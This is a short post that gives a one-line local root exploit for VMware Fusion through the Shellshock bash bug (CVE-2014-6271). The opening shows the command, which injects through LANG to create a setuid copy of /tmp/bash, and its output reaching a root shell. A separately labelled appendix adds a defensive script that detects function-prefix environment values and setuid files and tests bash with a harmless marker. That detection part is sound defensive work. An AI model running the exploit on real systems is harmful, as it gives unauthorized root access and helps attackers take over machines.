Just wanted to post a quick alternative to Metasploit’s VMware Fusion CVE-2014-6271 exploit (metasploit-framework/modules/exploits/osx/local/vmware_bash_function_root.rb) for local shell use.

hephaestus:~ jdugie$ for cmd in "cp /bin/bash /tmp/" "chmod 4755 /tmp/bash"; do LANG='() { :;}; '${cmd} /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx-stats /dev/random; done; echo; /tmp/bash -p;
2014-09-25T20:38:25.964| ServiceImpl_Opener: PID 17903
2014-09-25T20:38:27.473| ServiceImpl_Opener: PID 17926

bash-3.2# whoami
root
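
A defender-side companion to the session above, added here as an example and not part of the original post or of Metasploit: it flags environment variables carrying the `() {` function-definition prefix used in the `LANG` value, lists set-uid files such as the `/tmp/bash` copy, and checks whether a given bash still runs text that follows an imported function definition. The function names, the marker string and the sample environment are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example. All names and sample data below are constructed.

# Read NAME=value lines on stdin and print the names whose value starts with
# the "() {" prefix that pre-patch bash imported as a function definition.
# Patched bash only imports functions from BASH_FUNC_* variables, so those
# are skipped; any other name carrying the prefix is suspect.
flag_function_env() {
    while IFS= read -r line; do
        name=${line%%=*}
        value=${line#*=}
        case $name in
            BASH_FUNC_*) continue ;;
        esac
        case $value in
            "() {"*) printf '%s\n' "$name" ;;
        esac
    done
}

# List set-uid regular files under a directory (default /tmp). A shell
# binary showing up here matches the "chmod 4755 /tmp/bash" step above.
find_setuid_files() {
    find "${1:-/tmp}" -xdev -type f -perm -4000 2>/dev/null
}

# Return 0 if the bash binary given as $1 executes text placed after an
# imported function definition (the CVE-2014-6271 behaviour), 1 otherwise.
# The trailing text only echoes a harmless marker.
bash_runs_trailing_code() {
    out=$(env 'probe=() { :;}; echo CONSTRUCTED_MARKER' "$1" -c : 2>/dev/null) || return 1
    [ "$out" = "CONSTRUCTED_MARKER" ]
}

# Constructed sample environment: one suspicious value, one legitimate
# exported function as written by a patched bash.
sample_env() {
    printf '%s\n' \
        'HOME=/Users/example' \
        'LANG=() { :;}; echo CONSTRUCTED_MARKER' \
        'TERM=xterm-256color' \
        'BASH_FUNC_ok%%=() { :; }'
}
```

Typical use is `env | flag_function_env`, `find_setuid_files /tmp` and `bash_runs_trailing_code /bin/bash`; values that span several lines are not handled by the line-based reader.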